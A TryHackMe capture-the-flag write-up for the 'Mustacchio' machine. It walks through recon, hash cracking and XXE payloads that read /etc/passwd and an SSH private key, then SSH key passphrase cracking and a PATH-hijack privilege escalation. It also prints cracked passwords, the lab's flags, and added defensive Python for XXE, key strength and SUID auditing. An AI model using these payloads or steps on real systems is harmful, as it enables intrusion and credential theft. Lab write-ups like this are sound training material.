TryHackMe - Mustacchio - Writeup

Easy boot2root Machine

Nmap Scan

root@ip-10-10-97-27:~# nmap -sCV -p- -T4

Starting Nmap 7.60 ( ) at 2021-06-12 09:53 BST
Nmap scan report for (
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
MAC Address: 02:71:2C:CE:E8:AD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 637.98 seconds

Directory Fuzzing

root@ip-10-10-97-27:~# dirb

DIRB v2.22    
By The Dark Raver

START_TIME: Sat Jun 12 09:16:44 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
==> DIRECTORY:                                                              
==> DIRECTORY:                                                               
==> DIRECTORY:                                                              
+ (CODE:200|SIZE:1752)                                                   
+ (CODE:200|SIZE:28)                                                     
+ (CODE:403|SIZE:277)   

In the folder there is a file called users.bak, which is an SQLite database.

root@ip-10-10-97-27:~# file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001

Open the SQLite database in DB Browser for SQLite: there is a user named admin with an MD5 password hash. The MD5 hash can also be read directly from the file.

Go to and crack the MD5 hash to recover the password.


SSH is enabled on the machine, so try logging in with admin:bulldog19. That fails over SSH, but we know there is another service on port 8765, so log in to the admin panel there with admin:bulldog19. We get access to the admin panel.

In the source of home.php you will find this; the commented-out document.cookie = "Example=/auth/dontforget.bak" is interesting.

<script type="text/javascript">
      //document.cookie = "Example=/auth/dontforget.bak"; 
      function checktarea() {
        let tbox = document.getElementById("box").value;
        if (tbox == null || tbox.length == 0) {
          alert("Insert XML Code!")
        }
      }
</script>

    <!-- Barry, you can now SSH in using your key!-->

Follow that path (/auth/dontforget.bak) and you get this XML file:

<?xml version="1.0" encoding="UTF-8"?>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>This paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>

This XML viewer is vulnerable to XXE. Use the payload below to fetch the users on this machine. The comment in the HTML source hints that there is an SSH key, so we will try to fetch that next.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
   <!ELEMENT xxepay ANY >
   <!ENTITY xxe SYSTEM  "file:///etc/passwd" >]>
<xxepay>
  <name>&xxe;</name>
  <author>Any Author</author>
  <com>Any comment</com>
</xxepay>

This payload returned the passwd file, which shows that the user on this machine is barry. I then changed the path to /home/barry/.ssh/id_rsa to fetch the SSH key.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
   <!ELEMENT xxepay ANY >
   <!ENTITY xxe SYSTEM  "file:///home/barry/.ssh/id_rsa" >]>
<xxepay>
  <name>&xxe;</name>
  <author>Any Author</author>
  <com>Any comment</com>
</xxepay>
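The root cause is an XML parser that accepts DTDs and resolves external entities. As an added example, not code from the room or this writeup, here is how the comment viewer's parsing would look in Python with both switched off; the <comment> root element and the function names are my assumptions:

```python
# Added example (not the room's PHP viewer): a comment parser that refuses any DTD
# up front and, as defence in depth, never loads external entities.
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
# Constructed sample in the dontforget.bak layout; the <comment> root element
# is an assumption, the writeup shows only the three child elements.
LEGIT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<comment><name>Joe Hamd</name><author>Barry Clad</author><com>hi</com></comment>"""
# The writeup's probe, with the entity referenced from <name>.
XXE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [<!ELEMENT xxepay ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<xxepay><name>&xxe;</name><author>Any Author</author><com>Any comment</com></xxepay>"""

class _Fields(ContentHandler):
    def __init__(self):
        super().__init__()
        self.values, self._open = {}, None

    def startElement(self, tag, attrs):
        if tag in ("name", "author", "com"):
            self._open, self.values[tag] = tag, ""

    def characters(self, data):
        if self._open:
            self.values[self._open] += data

    def endElement(self, tag):
        if tag == self._open:
            self._open = None

def parse_comment(xml_text: str) -> dict:
    """Return {name, author, com}; raise ValueError if the input carries a DTD."""
    # Control 1: the viewer never needs a DTD, so reject DOCTYPE/ENTITY outright.
    if "<!DOCTYPE" in xml_text.upper() or "<!ENTITY" in xml_text.upper():
        raise ValueError("DTD and entity declarations are not accepted")
    # Control 2: even if a DTD slipped past, external general entities stay unresolved.
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    handler = _Fields()
    parser.setContentHandler(handler)
    parser.feed(xml_text.encode("utf-8"))
    parser.close()
    return handler.values

def is_rejected(xml_text: str) -> bool:
    try:
        parse_comment(xml_text)
    except ValueError:
        return True
    return False
```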

Here is the private key

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E


This key is encrypted, so we have to crack its passphrase; for that we use ssh2john and john.

root@ip-10-10-97-27:~# python3 id_rsa > id_rsa.enc
root@ip-10-10-97-27:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (id_rsa)

The password is: urieljames
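The passphrase fell to a rockyou run so quickly because the key is in the legacy PEM format (the Proc-Type/DEK-Info header above), whose KDF is a single MD5 round, exactly what john's cost lines report. The following added example, not from the writeup, classifies a private key by the KDF protecting it; the OpenSSH-format samples are constructed in code and the function names are mine:

```python
# Added example, not from the writeup: classify an SSH private key by the KDF that
# protects it. A legacy PEM key (Proc-Type/DEK-Info header) derives its AES key with
# one MD5 round (john: KDF cost 0, iteration count 1); OpenSSH-format keys record
# cipher, KDF name and bcrypt rounds inline.
import base64
import struct
# Constructed sample: the writeup's two header lines in a standard PEM envelope;
# the base64 body is omitted because only the header is inspected.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

(base64 body omitted)
-----END RSA PRIVATE KEY-----"""
_MAGIC = b"openssh-key-v1\0"

def _sshstr(b: bytes) -> bytes:            # length-prefixed SSH string
    return struct.pack(">I", len(b)) + b

def _read_str(buf: bytes, pos: int):       # inverse of _sshstr: (value, next_pos)
    (n,) = struct.unpack_from(">I", buf, pos)
    return buf[pos + 4:pos + 4 + n], pos + 4 + n

def make_openssh_blob(cipher: str, kdf: str, rounds: int = 0) -> str:
    """Constructed OpenSSH-format header (no key material), for testing only."""
    opts = _sshstr(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = _MAGIC + _sshstr(cipher.encode()) + _sshstr(kdf.encode()) + _sshstr(opts)
    body = base64.b64encode(blob + struct.pack(">I", 1)).decode()   # nkeys = 1
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----"

def classify_private_key(pem: str, min_rounds: int = 16) -> dict:
    """Report format, cipher, KDF, rounds and whether the passphrase protection is weak."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        buf = base64.b64decode("".join(l for l in pem.splitlines() if not l.startswith("-----")))
        if not buf.startswith(_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, pos = _read_str(buf, len(_MAGIC))
        kdf, pos = _read_str(buf, pos)
        opts, _ = _read_str(buf, pos)
        rounds = None
        if kdf == b"bcrypt":                    # kdfoptions = string salt, uint32 rounds
            _salt, p = _read_str(opts, 0)
            (rounds,) = struct.unpack_from(">I", opts, p)
        return {"format": "openssh", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "rounds": rounds, "weak": kdf != b"bcrypt" or rounds < min_rounds}
    # Legacy PEM: KDF fixed at one MD5 round (EVP_BytesToKey), so always cheap to guess offline.
    encrypted = "Proc-Type: 4,ENCRYPTED" in pem
    dek = [l for l in pem.splitlines() if l.startswith("DEK-Info:")]
    cipher = dek[0].split(":", 1)[1].strip().split(",")[0] if dek else None
    return {"format": "pem", "cipher": cipher, "kdf": "MD5, 1 round" if encrypted else None,
            "rounds": 1 if encrypted else None, "weak": True}
```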

Now we can use that passphrase to unlock the SSH key. The login succeeds:

root@ip-10-10-97-27:~# ssh -i id_rsa barry@
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:
 * Management:
 * Support:

13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$ cat user.txt

What is the user flag?

  • Answer: 62d77a4d5f97d47c5aa38b3b2651b831

For privilege escalation the first thing I try is sudo -l, so I tried it on this machine too, but it did not work. Moving on to check the /etc/ and /opt/ folders, there is nothing there.

The room's hint mentions SUID.

Let's find files with the SUID bit set:

barry@mustacchio:~$ find / -perm /4000 2>/dev/null

The odd one out is the /home/joe/live_log executable. When you run it you get the live log of the admin panel. Use the strings command to see which command it relies on to display that log.

barry@mustacchio:~$ strings /home/joe/live_log
Live Nginx Log Reader
tail -f /var/log/nginx/access.log

tail -f /var/log/nginx/access.log: tail is what displays the live log, and it is invoked by bare name rather than by an absolute path, so whichever tail comes first on the caller's PATH is the one that runs.

Now go to the /tmp folder and create a file named tail:



Make it executable and put /tmp at the front of $PATH:

barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ which tail

With /tmp now at the front of $PATH, run /home/joe/live_log and you get a root shell.

root@mustacchio:/tmp# cat /root/root.txt

What is the root flag?

  • Answer: 3223581420d906c4dd1a5f9b530393a5
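The defect behind the escalation is a setuid helper that calls tail by bare name, so the caller's PATH decides which tail runs. As an added example, not part of the writeup, this Python audit walks a tree for SUID/SGID files and flags embedded command lines with that shape; the fixture files it builds and the function names are my own:

```python
# Added example, not from the writeup: audit SUID/SGID executables for embedded
# command lines that name a program without a path, the pattern `strings` exposed
# in /home/joe/live_log; such a binary runs whatever "tail" is first on the caller's PATH.
import os
import re
import stat
import tempfile
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")          # roughly what `strings` prints
# First token is a bare lowercase command name (no slash), then its arguments.
_CMD_LINE = re.compile(r"^\s*(?P<cmd>[a-z][a-z0-9_.-]*)\s+(?P<args>\S.*)$")

def embedded_strings(path: str) -> list:
    with open(path, "rb") as fh:
        return [m.group().decode("ascii") for m in _PRINTABLE.finditer(fh.read())]

def is_setuid_or_setgid(path: str) -> bool:
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))

def suspicious_commands(path: str) -> list:
    """Embedded strings shaped like 'cmd -opt ...' whose cmd has no path (heuristic)."""
    hits = []
    for s in embedded_strings(path):
        m = _CMD_LINE.match(s)
        if m and any(t.startswith(("-", "/")) for t in m.group("args").split()):
            hits.append(s)
    return hits

def audit_tree(root: str = "/") -> dict:
    """Map each SUID/SGID file under root to its suspicious embedded commands."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setuid_or_setgid(path) and (hits := suspicious_commands(path)):
                    findings[path] = hits
            except OSError:          # unreadable file, vanished entry, etc.
                continue
    return findings

def build_sample_tree() -> tuple:   # constructed fixture: one hijackable SUID file, one safe
    root = tempfile.mkdtemp()
    bad, good = os.path.join(root, "live_log"), os.path.join(root, "safe_log")
    for path, text in ((bad, b"tail -f /var/log/nginx/access.log"),
                       (good, b"/usr/bin/tail -f /var/log/nginx/access.log")):
        with open(path, "wb") as fh:
            fh.write(b"\x7fELF\x00Live Nginx Log Reader\x00" + text + b"\x00")
        os.chmod(path, 0o4755)
    return root, bad, good
```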

Room Link: Mustacchio

Written on June 12, 2021